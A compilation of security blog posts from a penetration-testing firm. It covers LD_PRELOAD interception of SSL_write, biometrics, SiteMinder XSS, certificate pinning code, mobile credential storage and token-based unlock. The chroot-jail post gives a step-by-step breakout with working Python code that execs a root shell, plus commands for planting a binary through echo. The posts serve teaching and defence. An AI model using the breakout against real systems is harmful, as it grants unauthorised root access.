Now that LD_PRELOAD is set we're ready to start intercepting calls to SSL_write on processes executed from here onward. To test this let's go ahead and use the curl utility over HTTPS and intercept the HTTPS request.
sigma@ubuntu:~/code$ curl https://www.netspi.com > /dev/null
% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed
100 19086 0 19086 0 0 37437 0 --:--:-- --:--:-- --:--:-- 60590
sigma@ubuntu:~/code$
After successful completion of the command there should be a log file that we can examine:
sigma@ubuntu:~/code$ cat logfile
Process 11423:
GET / HTTP/1.1
User-Agent: curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
Host: www.netspi.com
Accept: */*
sigma@ubuntu:~/code$
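From the defensive side, a process started with LD_PRELOAD set, or one that has a shared object mapped from outside the normal library directories, can be spotted from /proc. This added example (not part of the original post) performs both checks on constructed environ and maps samples that mirror the curl run above; on a live Linux host scan_process(pid) reads the real files. TRUSTED_LIB_PREFIXES is an assumption to adjust per distribution.

```python
import os
from pathlib import Path
from typing import Dict, List

# Directories from which legitimately linked shared objects are normally mapped.
# Assumption: adjust to the distribution's real library paths before relying on it.
TRUSTED_LIB_PREFIXES = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")

# Constructed sample of /proc/<pid>/environ (NUL-separated KEY=VALUE pairs).
SAMPLE_ENVIRON = (
    b"HOME=/home/sigma\x00"
    b"LD_PRELOAD=/home/sigma/code/libhook.so\x00"
    b"PATH=/usr/bin:/bin\x00"
)

# Constructed sample of /proc/<pid>/maps lines for a curl process like the one above.
SAMPLE_MAPS = """\
08048000-08084000 r-xp 00000000 08:01 131140     /usr/bin/curl
b7500000-b7501000 r-xp 00000000 08:01 262274     /home/sigma/code/libhook.so
b7502000-b7650000 r-xp 00000000 08:01 393223     /lib/i386-linux-gnu/libssl.so.1.0.0
b7700000-b7800000 r-xp 00000000 08:01 393300     /lib/i386-linux-gnu/libc-2.15.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
"""


def parse_environ(raw: bytes) -> Dict[str, str]:
    """Turn the NUL-separated environ block into a dict."""
    env: Dict[str, str] = {}
    for entry in raw.split(b"\x00"):
        if b"=" in entry:
            key, value = entry.split(b"=", 1)
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def preload_paths(env: Dict[str, str], ld_so_preload: str = "") -> List[str]:
    """Libraries forced in via LD_PRELOAD (colon or space separated) or /etc/ld.so.preload."""
    paths = env.get("LD_PRELOAD", "").replace(":", " ").split()
    for line in ld_so_preload.splitlines():
        line = line.split("#", 1)[0].strip()   # the file allows '#' comments
        if line:
            paths.append(line)
    return paths


def untrusted_mappings(maps_text: str) -> List[str]:
    """Mapped shared objects that live outside the trusted library directories."""
    found: List[str] = []
    for line in maps_text.splitlines():
        parts = line.split(None, 5)             # address perms offset dev inode path
        if len(parts) < 6:
            continue
        path = parts[5].strip()
        if not path.startswith("/") or ".so" not in os.path.basename(path):
            continue
        if not path.startswith(TRUSTED_LIB_PREFIXES) and path not in found:
            found.append(path)
    return found


def assess(environ_raw: bytes, maps_text: str, ld_so_preload: str = "") -> Dict[str, List[str]]:
    """Combine both signals for one process."""
    return {
        "preload": preload_paths(parse_environ(environ_raw), ld_so_preload),
        "untrusted_libs": untrusted_mappings(maps_text),
    }


def scan_process(pid: int) -> Dict[str, List[str]]:
    """Read the real /proc files for one pid (Linux only)."""
    proc = Path("/proc") / str(pid)
    ld = Path("/etc/ld.so.preload")
    return assess(
        (proc / "environ").read_bytes(),
        (proc / "maps").read_text(),
        ld.read_text() if ld.exists() else "",
    )


def main() -> None:
    if not Path("/proc").is_dir():
        print("no /proc here; this scanner needs Linux")
        return
    for entry in Path("/proc").iterdir():
        if not entry.name.isdigit():
            continue
        try:
            result = scan_process(int(entry.name))
        except (PermissionError, FileNotFoundError, ProcessLookupError):
            continue   # another user's process, or it exited mid-scan
        if result["preload"] or result["untrusted_libs"]:
            print(f"pid {entry.name}: {result}")


if __name__ == "__main__":
    main()
```

The environ check only sees the environment the process started with, so the maps check is the one to trust when a library was injected some other way.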
As we can see, the request has been logged in plaintext while the application was allowed to function normally. Had this been a scenario where data integrity relied heavily upon SSL encryption and the assumption that man-in-the-middle attacks would occur only at the network level, any such integrity would have been compromised.

These are really just a few examples of what's possible using the dynamic loader API and LD_PRELOAD. Since the shared library we create is loaded into the running process's memory space, we could do things like dump the memory of the process to examine it at runtime or tamper with runtime variables. Other uses for this method of function call hooking and loading generally fall under the use case of user-land rootkits and malware, which will be the focus of the next article in this series.

[post_title] => Function Hooking Part I: Hooking Shared Library Function Calls in Linux
[guid] => https://netspiblogdev.wpengine.com/?p=1155

[post_date] => 2013-06-24 07:00:43

Let's go back in time to June 2012. LinkedIn was compromised and 6.5 million password hashes were released to the internet. Everyone changed their password (right?) and it wasn't *that* big a deal. Now, let's jump forward in time, to a point when biometric authentication has become more common.
In this new era, LinkedIn gets compromised and 6.5 million hashed fingerprints are released to the internet. So everyone does what? Do users switch the fingers they use for authentication?

Biometric authentication is a great idea that unfortunately suffers from some serious drawbacks, especially when deployed in the cloud. Its greatest weakness is immutability. Your fingerprints aren't going to change, and failing some pretty major plastic surgery, your face won't either. That means one big problem: you can't change a compromised biometric. Do you have any publicly accessible pictures on Facebook? What about videos? Could those be used to defeat facial recognition, even with liveness detection? Because your biometric features are set in stone, there is a much greater responsibility to protect them, and unfortunately you aren't the only one who bears that responsibility.

Cloud services that leverage biometrics aren't very common yet, but assuming biometrics catch on, it's only a matter of time before the marketing types make it happen. How is that data stored? Can you really trust your service provider to take better care of your fingerprint than your password? Millions of passwords get exposed by breaches like LinkedIn's every year. Most services require users to register at least two fingerprints for fingerprint-based authentication, which gives a user at most ten "password resets" for an entire lifetime. After that, the data used for authentication starts repeating: which fingers you use may change, but once an attacker has a usable copy of a fingerprint, they can replay it against any authentication scheme that relies on that finger's data. A compromised fingerprint is a credential that can never be rotated. Note, too, that a stored fingerprint template is not a hash in the cryptographic sense: matching has to tolerate variation between scans, so templates generally cannot be protected the way a salted password hash can.

That isn't the only issue with immutability, either. There is a reason best practices recommend using separate passwords for separate services.
If you use biometric authentication for multiple services, the security of your access to those services is linked, just as it is when you reuse a password. Essentially, you're trusting every service provider with the password to all your other accounts. Maybe that's okay with you; you're fine with some social network knowing your bank account password. Unfortunately, it isn't that simple. If that social network ever gets compromised, within hours your bank account "password" will be on Pastebin, and I'll eat my hat if some enterprising script kiddie doesn't have a bot testing username/fingerprint combinations against every bank service they can find. This only gets worse once you run out of fingers. If anyone ever associates all ten of your fingerprints with your identity, no account you ever create will be safe with fingerprint authentication again.

Maybe I'm being a little histrionic; that would be a fair criticism. There are practices that could (if not totally) mitigate these issues. After all, biometrics are supposed to be one factor in a two-factor authentication scheme, right? So we'll at least have a password in addition to our fingerprints. And any serious company that deploys biometric authentication will surely encrypt the data and keep it somewhere safe, away from the key. Then again, take a look at biometric authentication right now. My coworker Karl wrote a blog post about consumer-grade fingerprint readers in Lenovo laptops. His conclusion was that the software was pretty lax about storing sensitive data. What happens when practices like that move into realms like banking and health care?

Truth be told, I don't think this problem is unsolvable. It's always possible to simply not use biometrics!
For anyone who still wants to use biometric authentication, take this warning and exercise real caution in the storage of your users' data, and keep in mind that the technology needs some serious refinement before consumer-grade biometric scanners provide any real protection.

(Post title: Biometrics in the age of Pastebin. Last modified 2021-04-13.)

(Next post, published 2013-06-17.)

CA SiteMinder is a Single Sign-On (SSO) and web access management product used to authenticate users and control access to web applications and portals. Your company may be considering purchasing SiteMinder or a similar product, or may already have deployed such a solution in your environment. Out of the box, CA SiteMinder can block requests carrying some of the typical OWASP Top 10 attack payloads, including SQL injection and cross-site scripting (XSS). I worked with it a few years ago in my previous job and it worked well. That is, until the developers got involved. Their business requirements had them pass full SQL statements from the browser to their application. Additionally, many of them thought they also needed to pass the “” to the web application. We had to tweak CA SiteMinder to allow these types of requests. As you may have guessed, their application was now potentially vulnerable to SQL injection and XSS. These dangerous configurations also make some of CA SiteMinder's own standard web pages vulnerable to XSS.
CA SiteMinder ships with some standard web pages and executables that you can use in your web application, including loginandregister-dms.fcc, loginandregisterwithforgottenpassword-dms.fcc, login.fcc and smpwservicescgi.exe. If CA SiteMinder is configured not to stop XSS attacks, these pages become vulnerable too. NetSPI has performed application penetration tests in the last few months where the applications were using CA SiteMinder, and both the applications themselves and the CA SiteMinder files were vulnerable to XSS. SiteMinder is intended to reduce risk, not expand it. These vulnerabilities could have been prevented by not reconfiguring CA SiteMinder to stop blocking XSS. Do not allow developers to dictate that security be weakened; work with them, reduce their requests to the most basic requirements, and figure out how to deliver what they need securely. Remember, security and development should be partners, not bitter rivals. You want multiple layers of prevention, so that if your application is vulnerable, CA SiteMinder still prevents the vulnerability from being exploited. Just as important, a filtering layer in front of the application is not a substitute for fixing the application: parameterized queries and output encoding in the application itself are the controls that still hold when the filter is relaxed or bypassed.

(Post title: Great, you use CA SiteMinder, but you broke it! Last modified 2021-04-13.)

(Next post, published 2013-04-11.)

Many times during our mobile application penetration tests, we find that the applications are vulnerable to man-in-the-middle (MITM) attacks.
Certificate pinning is one part of the answer to MITM attacks against a mobile application. For those who do not know about certificate pinning: no, this is not pinning your CISSP certificate to the wall.

What is it?

Certificate pinning is hardcoding or storing the information for specific digital certificates or public keys in a mobile application. Only the predefined certificates or keys are accepted for secure communication; all others fail, even if the user has trusted other certificates on the device. A mobile application knows which servers it will connect to, so it can check for those specific certificates. A general-purpose browser cannot pin in the same way, because it does not know in advance which servers it will talk to; browsers do ship preloaded pins for a small set of specific sites, but they cannot pin for arbitrary servers.

What happens during an SSL Connection?

When an application receives an SSL certificate from a server, it should verify at least the following:
  1. The certificate chains to a trusted root certificate authority (CA), and every certificate in the chain is within its validity period
  2. The server's hostname (the name the application connected to) matches the Common Name (CN) or a Subject Alternative Name (SAN) in the certificate
When these checks fail, a browser throws up a warning and lets the user decide what to do; in many cases the general user population will not understand the warning and will just accept the invalid certificate. A mobile application should not offer that choice at all: it should fail the connection.

What are we trying to do by certificate pinning?

The idea is to prevent a man-in-the-middle attack, in which an attacker gets between the client and the server. The attacker could simply eavesdrop on the conversation, or could change the data as it moves to the client or server. An attacker who gains control of a user's operating system can install additional trusted root certificate authorities. Those root CAs can then sign new certificates for any hostname, and those certificates will satisfy normal SSL validation. The same applies if any of the many CAs a device trusts by default is compromised or mis-issues a certificate. Certificate pinning prevents this by ensuring that only a specific server certificate or public key is accepted when secured traffic is initiated.

How do we implement certificate pinning?

Distribute the server's certificate, or just its public key, with the application. Any time the application begins an SSL exchange with the server, check that the certificate presented in the handshake (or the public key inside it) matches the one shipped with the app, and abort the connection if it does not. This takes the CA system out of the equation: if the pinned key matches, you are talking to the right server regardless of who signed the certificate. Pinning the public key rather than the whole certificate is usually preferable, since the certificate can then be renewed with the same key without breaking the pin. Either way, plan for rotation: ship at least one backup pin for a key you hold offline, because an app with a single pin and a lost or compromised key cannot connect to anything until users update it.
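The check described above, as an added example that is not code from the original post: a standalone Python module that walks a certificate's DER encoding to pull out the SubjectPublicKeyInfo, hashes it into the base64(SHA-256) pin format used by HPKP, OkHttp, Android's network security config and TrustKit, and accepts a connection only when the presented leaf's pin is in the app's pin set. The certificate it checks is a constructed skeleton with placeholder contents built inline, so the module runs offline; pinned_connect() shows the same check applied to a live TLS socket. All names (extract_spki, spki_pin, check_pins, pinned_connect, fake_cert, APP_PINS) are mine.

```python
"""SPKI (public-key) pinning check in plain Python.

Added example for this post, not code from the original article.  Pin format:
base64(SHA-256(DER SubjectPublicKeyInfo)), as used by HPKP, OkHttp, Android's
network security config and TrustKit.  A synthetic certificate is built inline
so this runs offline; real DER bytes come from sock.getpeercert(binary_form=True).
"""
import base64, hashlib, hmac, socket, ssl
from collections import namedtuple

Element = namedtuple("Element", "tag start value_start end")

def _read_tlv(buf, pos):
    """Decode the DER tag/length at buf[pos] (short and long length forms)."""
    tag, length, cursor = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                  # long form: N length bytes follow
        nbytes = length & 0x7F
        length = int.from_bytes(buf[cursor:cursor + nbytes], "big")
        cursor += nbytes
    return Element(tag, pos, cursor, cursor + length)

def _elements(buf, start, end):
    """Yield the elements inside a constructed DER value occupying buf[start:end]."""
    pos = start
    while pos < end:
        el = _read_tlv(buf, pos)
        yield el
        pos = el.end

def extract_spki(cert_der):
    """DER SubjectPublicKeyInfo of an X.509 cert.
    TBSCertificate ::= SEQUENCE { [0] version OPTIONAL, serialNumber, signature,
                                  issuer, validity, subject, subjectPublicKeyInfo, ...}"""
    cert = _read_tlv(cert_der, 0)
    tbs = next(_elements(cert_der, cert.value_start, cert.end))
    fields = list(_elements(cert_der, tbs.value_start, tbs.end))
    if fields[0].tag == 0xA0:                          # explicit [0] version present
        fields = fields[1:]
    spki = fields[5]               # serial, sigAlg, issuer, validity, subject, SPKI
    if spki.tag != 0x30:
        raise ValueError("subjectPublicKeyInfo is not a SEQUENCE")
    return cert_der[spki.start:spki.end]

def spki_pin(cert_der):
    """base64(SHA-256(SPKI)); unchanged when the cert is renewed with the same key."""
    return base64.b64encode(hashlib.sha256(extract_spki(cert_der)).digest()).decode()

def check_pins(cert_der, pins):
    """True only if the leaf's pin is in the app's pin set (primary + backup)."""
    pin = spki_pin(cert_der)
    return any(hmac.compare_digest(pin, p) for p in pins)

def pinned_connect(host, port, pins):
    """CA and hostname validation first, then the pin check; abort on mismatch.
    Makes a network connection, so it is not exercised offline."""
    ctx = ssl.create_default_context()
    sock = ctx.wrap_socket(socket.create_connection((host, port)), server_hostname=host)
    if not check_pins(sock.getpeercert(binary_form=True), pins):
        sock.close()
        raise ssl.SSLError("public key pin mismatch for %s" % host)
    return sock

# ---- constructed test data: right X.509 layout, placeholder contents, NOT a real cert ----
def _der(tag, body):
    """Encode one DER TLV, long length form when the body is 128 bytes or more."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body

def fake_spki(seed):
    """SEQUENCE { AlgorithmIdentifier(rsaEncryption), BIT STRING } with filler key bits."""
    alg = _der(0x30, _der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01") + _der(0x05, b""))
    return _der(0x30, alg + _der(0x03, b"\x00" + bytes((seed + i) & 0xFF for i in range(64))))

def fake_cert(spki, with_version=True):
    """Certificate skeleton; with_version=False gives the v1 layout without the [0] tag."""
    sig_alg = _der(0x30, _der(0x06, b"\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b") + _der(0x05, b""))
    name = _der(0x30, _der(0x31, _der(0x30, _der(0x06, b"\x55\x04\x03") + _der(0x0c, b"pin.example"))))
    validity = _der(0x30, _der(0x17, b"130101000000Z") + _der(0x17, b"140101000000Z"))
    fields = [_der(0x02, b"\x01"), sig_alg, name, validity, name, spki]
    if with_version:
        fields.insert(0, _der(0xA0, _der(0x02, b"\x02")))   # [0] EXPLICIT version v3
    tbs = _der(0x30, b"".join(fields))
    return _der(0x30, tbs + sig_alg + _der(0x03, b"\x00" + b"\xab" * 32))  # fake signature

SERVER_SPKI, BACKUP_SPKI, ROGUE_SPKI = fake_spki(1), fake_spki(2), fake_spki(3)
# What the app ships: the live server key plus a backup pin for a key held offline.
APP_PINS = {spki_pin(fake_cert(SERVER_SPKI)), spki_pin(fake_cert(BACKUP_SPKI))}

if __name__ == "__main__":
    for label, cert in [("server cert", fake_cert(SERVER_SPKI)),
                        ("rogue-CA cert", fake_cert(ROGUE_SPKI))]:
        print("%-14s accepted=%s" % (label, check_pins(cert, APP_PINS)))
```

Pinning the SPKI rather than the whole certificate means the pin survives routine renewal as long as the key pair is kept; the second pin in APP_PINS is the backup that lets you rotate to a new key without locking users out. Note the order in pinned_connect(): standard chain and hostname validation still run first, and the pin narrows the accepted set further rather than replacing them.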

Is there a way to break certificate pinning?

An attacker would have to decompile the application, change the code, rebuild it and redeploy it. Another option would be to run the application under a debugger or instrument it at runtime. For Android, you can obfuscate your code. You can also check whether the application is running under a debugger. Code signing will also make it more difficult for an attacker to create an unauthorized patch for your application. For iOS, see Detecting the Debugger; for Android, see Securing Android LVL Applications. Neither of the above options is perfect, but they do help. Both of these methods make the attacker's job harder, but not impossible. Keep in mind what pinning is for: it protects users from a hostile network or a rogue CA, not from an attacker who already controls the device or is running a modified copy of the app.

Where else can I find information on this?

OWASP provides some information and sample code: the User Privacy Protection Cheat Sheet and the Pinning Cheat Sheet. Moxie Marlinspike provides good information for Android on his blog: Your app shouldn't suffer SSL's problems. iSEC Partners provides information for iOS: SSL Pinning on iOS.

Be sure to check out author Steve Kern's webinar on Assessing the Security of Your Mobile Applications.

(Post title: Certificate Pinning in a Mobile Application. Last modified 2021-04-13.)

(Next post, published 2013-03-25.)

Lately I've been working with some older technologies, and I've gotten to play with some of the restricted-access shells that used to be popular. Many older appliances included an sshd that dropped users into a chroot jail with restricted access to binaries. This was done in an attempt to let the user access the appliance's functionality without exposing the internal workings of the application. Fortunately for us, many chroot jails fail to set some essential security bits properly, assuming that restricting binaries is enough to keep users out of the real filesystem, while also giving users root access inside their chroot jail. With just these three things, you can break out of such a chroot jail:
  1. Root access. You'll need root access *inside* the chroot jail to execute a breakout, because the chroot(2) call the breakout relies on requires CAP_SYS_CHROOT. This is the weakest link here, but many chroot jails are improperly configured, since root privileges are used to access the application functionality that the shell is supposed to expose.
  2. The echo utility (or printf). This is built into several shells, so you can rely on it in many situations.
  3. A file on which you have both write and execute permission. If the chroot jail has been properly secured you won't have access to chmod, but check the filesystem for such files. This lets you get your breakout binary onto the filesystem and execute it.
Now for the juicy bit. To break out of your jail, the basic steps are pretty simple.

Determine whether chmod is available inside the chroot jail. If it isn't, search for a file with both write and execute permission. You can use find / -writable -executable or ls -lR / | grep wx to search entire partitions for these files. This might be difficult if you don't have find or grep, but you can check common locations for executables like /bin/. Remember the path of this file, as you'll have to overwrite it later.

Spin up a VM with the same kernel and architecture as the machine hosting the chroot jail you're targeting. Grab code for a chroot breakout (there are examples all over the internet). For the purposes of this demonstration, I've put my code into breakout.c. All this code does is open a file descriptor for the current directory and then make a new chroot jail in a subdirectory. Since the program has saved a file descriptor to a directory outside this new sub-chroot jail, it uses fchdir to hop back out of the new jail and onto the main directory structure. Then it cd's all the way back up to the real root, where it execs a new shell.

Use gcc to compile the code into a binary on your VM (bin.o below), and link it statically with -static, since the shared libraries it would otherwise need may not exist inside the jail. Use hexdump with the command below to dump the binary into the format you'll need. The format string works just like a C printf statement:

hexdump -ve '"\\x" 1/1 "%02x"' bin.o > echo_this

Copy the contents of echo_this and paste them into an echo command inside the chroot jail (the first four bytes of any ELF binary are the magic shown below; the rest depend on your build). A statically linked binary turns into hundreds of kilobytes of escaped text, so if the shell chokes on the line length, split it across several echo commands, the first redirecting with > and the rest appending with >>:

echo -ne '\x7f\x45\x4c\x46…' > name_of_file_from_first_step (e.g. /bin/writeableBinary)
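The breakout program and the transfer step, as one added example that is not the author's breakout.c (the post does not reproduce that file). It is written in Python so the system-call sequence reads clearly: breakout() does what the C program described above does (open a handle to the current directory, chroot into a subdirectory, fchdir back out, climb with ".." to the real root, chroot(".") and exec a shell), must run as root inside a jail, and therefore only fires when invoked with --breakout. encode_for_echo() produces the same \xNN text as the hexdump command, and echo_commands() splits a binary into echo -ne lines that can be pasted into the jail one by one. The sample bytes are a constructed ELF identification header, not a real binary; every function name here is mine.

```python
"""Chroot breakout (the breakout.c sequence) and the echo-transfer encoder.

Added example for this post, not the author's breakout.c.  breakout() issues the
same system calls the post describes, through the os module; it needs root inside
the jail (chroot(2) requires CAP_SYS_CHROOT) and is only run on explicit request.
The encoder reproduces the hexdump output format so a binary can be recreated in
the jail with echo -ne; echo_commands() splits it so each pasted line stays short.
"""
import os
import sys


def breakout(shell="/bin/sh", scratch="breakout_tmp"):
    """Escape the current chroot jail and exec a shell on the real filesystem."""
    saved = os.open(".", os.O_RDONLY)          # 1. handle to a directory inside the jail
    os.makedirs(scratch, exist_ok=True)        # 2. make a sub-jail ...
    os.chroot(scratch)                         #    ... and move the root into it; the cwd
                                               #    stays where it was, now *outside* the root
    os.fchdir(saved)                           # 3. cwd back to the saved directory
    os.close(saved)
    for _ in range(1024):                      # 4. ".." is no longer stopped at the root,
        os.chdir("..")                         #    so this climbs to the real /
    os.chroot(".")                             # 5. make the real / our root again
    os.execv(shell, [shell])


def encode_for_echo(data):
    r"""Same text as: hexdump -ve '"\\x" 1/1 "%02x"' FILE   (e.g. \x7f\x45\x4c\x46...)"""
    return "".join("\\x%02x" % b for b in data)


def decode_echo(text):
    r"""Bytes that `echo -ne` writes for the escaped text; used to verify the round trip."""
    return bytes(int(text[i + 2:i + 4], 16) for i in range(0, len(text), 4))


def echo_commands(data, target, chunk=1024):
    """Shell lines that rebuild `data` at `target` inside the jail.
    The first line truncates the target (>), later ones append (>>), so no single
    command exceeds a comfortable line length for the jailed shell."""
    return ["echo -ne '%s' %s %s" % (encode_for_echo(data[i:i + chunk]),
                                     ">" if i == 0 else ">>", target)
            for i in range(0, len(data), chunk)]


if __name__ == "__main__":
    if sys.argv[1:] == ["--breakout"]:         # only when explicitly asked, as root in a jail
        breakout()
    else:
        sample = b"\x7fELF\x02\x01\x01" + bytes(9)   # constructed: an ELF64 e_ident only
        for line in echo_commands(sample, "/bin/writeableBinary", chunk=8):
            print(line)
```

In practice you still compile breakout.c statically on the matching VM and transfer that binary: Python is rarely present inside an appliance jail, which is the whole reason the post transfers a self-contained executable through echo in the first place. Step 2 of breakout() is the crux: chroot(2) changes the process's root but not its current directory, so a cwd left outside the new root is no longer fenced in by it.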

Finally, execute the file you've just overwritten to escape the jail. This gives you a root shell on the complete filesystem of the machine you were jailed in.

Preventing this is actually pretty simple and relies on some Linux security basics that sometimes get neglected in these chroot jails. Don't let the user run as root if you can avoid it; without CAP_SYS_CHROOT, the chroot(2) call the breakout depends on simply fails. If a user has to run as root, restrict access to binaries, make sure there are no files on which they have both write and execute permission, and consider mounting the jail's writable areas noexec.

(Post title: Attacking Restricted Linux Shells. Last modified 2021-04-13.)

(Next post, published 2012-10-16.)

I've been playing around with some Android exploitation lately, and I wanted to clarify the risks associated with storing domain credentials anywhere on a mobile device. Obviously, gaining access to your email or calendar could expose some sensitive information, or could allow for password resets via email or some social engineering, but I feel the real risk lies elsewhere. Most mobile devices, when associated with an Exchange server, store the credentials in cleartext. This means that any attacker who can get root access to your phone can gain access to your domain credentials.
The risk this presents depends on your organization, but if your organization has any external resources accessible via RDP, or uses AD authentication on the VPN, an attacker can hop right into your environment with those credentials. This is true on Android and iOS for sure; to prove it, my technical paper gives practical guidelines on how to extract credentials from a mobile phone. Check it out! Download "Dark Harvest - Active Directory Credentials on Mobile Devices".

(Post title: Android Exploitation Technical Paper Release. Last modified 2021-04-13.)

(Next post, published 2012-06-07.)

Pattern unlock sucks. Everyone knows it. Pattern unlock provides security benefits that are dubious at best. Anyone can shoulder-surf your pattern, or even your PIN, since most PINs are displayed at least momentarily in cleartext. Phone manufacturers have noticed the problem and tried to create new lock technologies that don't suck: Motorola put a fingerprint reader on the Atrix, and Google's ICS includes face unlock. While either of these options is better than PIN or pattern unlock, I think we can do better.

Every day there are new gadgets released to work with smartphones. Mostly these devices are curiosities or toys: smart balls that can be controlled by phone, or remote-control airplanes. All of these toys include the raw components to fix the problem with PIN/pattern unlock for good. Combine a wireless interface (Bluetooth, NFC or Wi-Fi) with certificate-based authentication, and we've just created a second factor for authenticating to your phone. Multi-factor authentication relies on two different pieces to prove your identity: something you have (a physical device, which will authenticate to your phone) and something you know (your PIN or pattern). This technology is actually pretty similar to modern cars that don't have a key but rather a radio fob that allows the car to be started whenever the fob is inside the cabin.

Imagine that, instead of or in addition to unlocking your phone with a PIN or pattern, you had a keychain dongle to activate. Press a button, or pass the phone within NFC distance, and the phone and your new authentication device exchange cryptographic signatures to validate each other's presence. Your phone now knows with some degree of certainty that it is in the presence of a physical token separate from the phone. If the phone puts a fresh random challenge into every exchange and the token signs it, the process is not vulnerable to mere replay attacks; encrypting the exchange as well as signing it can prevent man-in-the-middle attacks. That isn't to say this system wouldn't have any issues at all.
Obviously, if someone steals your phone, there is potential for them to steal your keys too, especially if you're robbed, mugged or your house is broken into. I'm not sure the security of your phone should be your top priority in those instances, however. Luckily, since your phone has a constant internet connection, it is even possible to create a method for deactivating an authentication token remotely. Much like how SSL certificates can be revoked, if the authentication device is designed correctly, a central authority could prevent a stolen token from authenticating to your phone. One caveat applies to any proximity-based token, the car fobs mentioned above included: a signature proves that the token answered, not that it is nearby, so an attacker who relays the radio exchange between a distant token and the phone can still unlock it. A deliberate button press on the token, or distance bounding in the protocol, is what actually ties the factor to the user's presence.
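The exchange sketched above, as an added example that is not part of the original post. The post has the phone and token exchange cryptographic signatures; to stay within Python's standard library this stand-in has the token answer a phone-chosen random challenge with an HMAC over it, a symmetric substitute for the signature, and exercises the two properties the post asks for: a replayed exchange must fail, and a central authority must be able to revoke a stolen token. Token, Phone, attempt_unlock and the message format are all assumptions of mine, not a published design.

```python
"""Second-factor unlock with a physical token: challenge-response with replay
rejection and remote revocation.

Added example for this post, not a design the author published.  The post has the
phone and token exchange cryptographic signatures; to stay within the standard
library this stand-in has the token answer a phone-chosen random challenge with an
HMAC over it (a symmetric "signature").  Token, Phone and their methods are mine.
"""
import hashlib
import hmac
import os
import time


class Token:
    """The keychain dongle: holds a secret from pairing and answers challenges."""
    def __init__(self, token_id, secret):
        self.token_id, self._secret = token_id, secret

    def respond(self, challenge):
        # Bound to this challenge only, so a captured response is useless later.
        return hmac.new(self._secret, b"unlock|" + challenge, hashlib.sha256).digest()


class Phone:
    def __init__(self):
        self._enrolled = {}        # token_id -> secret, set during in-person pairing
        self._revoked = set()      # ids pushed down by a remote revocation service
        self._pending = {}         # outstanding challenge -> expiry (monotonic seconds)

    def enrol(self, token):
        self._enrolled[token.token_id] = token._secret

    def revoke(self, token_id):
        self._revoked.add(token_id)

    def challenge(self, ttl=5.0):
        c = os.urandom(16)                               # fresh and unpredictable per attempt
        self._pending[c] = time.monotonic() + ttl
        return c

    def verify(self, token_id, challenge, response, pin_ok):
        """Unlock only if a fresh challenge was answered by an enrolled, unrevoked
        token (something you have) AND the PIN/pattern was right (something you know)."""
        expiry = self._pending.pop(challenge, None)      # single use: a replay fails here
        if expiry is None or time.monotonic() > expiry:
            return False
        if token_id in self._revoked or token_id not in self._enrolled:
            return False
        expected = hmac.new(self._enrolled[token_id], b"unlock|" + challenge,
                            hashlib.sha256).digest()
        return hmac.compare_digest(expected, response) and pin_ok


def attempt_unlock(phone, token, pin_ok=True):
    """One full exchange: phone issues a challenge, token answers, phone verifies."""
    c = phone.challenge()
    return phone.verify(token.token_id, c, token.respond(c), pin_ok)


if __name__ == "__main__":
    phone, fob = Phone(), Token("fob-1", os.urandom(32))
    phone.enrol(fob)
    print("genuine fob + PIN:", attempt_unlock(phone, fob))
    c = phone.challenge()
    r = fob.respond(c)
    phone.verify("fob-1", c, r, True)                     # legitimate use of this exchange
    print("same exchange replayed:", phone.verify("fob-1", c, r, True))
    print("cloned id, wrong key:", attempt_unlock(phone, Token("fob-1", b"x" * 32)))
    phone.revoke("fob-1")
    print("after remote revocation:", attempt_unlock(phone, fob))
```

Freshness comes from the phone's challenge being random, single-use and short-lived, not from the signature itself; a signed message that is not bound to such a challenge is exactly what an attacker replays. A real implementation would use asymmetric signatures so the phone stores only the token's public key, and, as the post says, would also have the token verify the phone.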

(Post title: Smartphone Pattern Unlock Sucks. Last modified 2021-04-13.)

(Next post, published 2012-04-02.)

Mobile security is the new hotness. The conventional wisdom hasn't yet been established, but many security proponents are gunning for users who jailbreak or root their devices. Symantec and Good both offer enterprise solutions that include features to manage root privileges on employee devices. Unfortunately, malware engineers have just changed their approach.

As background, many approaches to mobile security rely on preventing users from gaining root access. Root access gives a user ultimate control over the phone, regardless of the protections built into the device's operating system. Many users who acquire root access do so in order to harmlessly customize their device. Some leverage root privileges to subvert controls on functionality like mobile tethering. In any case, the process is seen as a risk, since a user who roots their phone is capable of granting these enhanced privileges to any application that requests escalation. If a user inadvertently grants root privileges to a piece of malware, that malware could access any data on the phone, including potentially protected corporate information. In August, a piece of malware called GingerMaster was found to escalate itself to root on any device it compromised, without the user granting anything.
From a management perspective, it no longer matters whether users in a given environment have rooted handsets. A user with a rooted device who installs a malicious app is now just as likely to expose sensitive or controlled information as a user without a rooted device. This means there isn't a technical control on the handset that can reliably prevent a given user from installing a malicious app and accidentally compromising anything from their email to their entire corporate environment. Just as with SSL certificate warnings, users will have to learn to differentiate between helpful apps and malicious ones. Thankfully, attackers are still disguising most of their malware pretty poorly; the cutting-edge GingerMaster, for example, was disguised as "Beauty of the Day."

(Post title: Mobile security is the new hotness. Last modified 2021-04-13.)

(Next post, published 2011-09-29.)

We all want to believe that our co-workers will do the right thing, and that we need to focus our security efforts on the bad guys "out there." However, the insider threat is one of the worst incidents an organization can withstand. Carnegie Mellon's CERT Coordination Center has launched the CERT Insider Threat Database. They have collected approximately 700 cases of insider activity that "resulted in the disruption of an organization's critical information technology (IT) services."
I realize that 700 cases since they started collecting data in 2001 seems like a drop in the bucket, but it's important to remember that these are cases involving critical IT services that were actually reported to CERT. Many incidents are not reported because the organization doesn't want the negative publicity, or, in even worse cases, because the perpetrator hasn't been caught (yet).

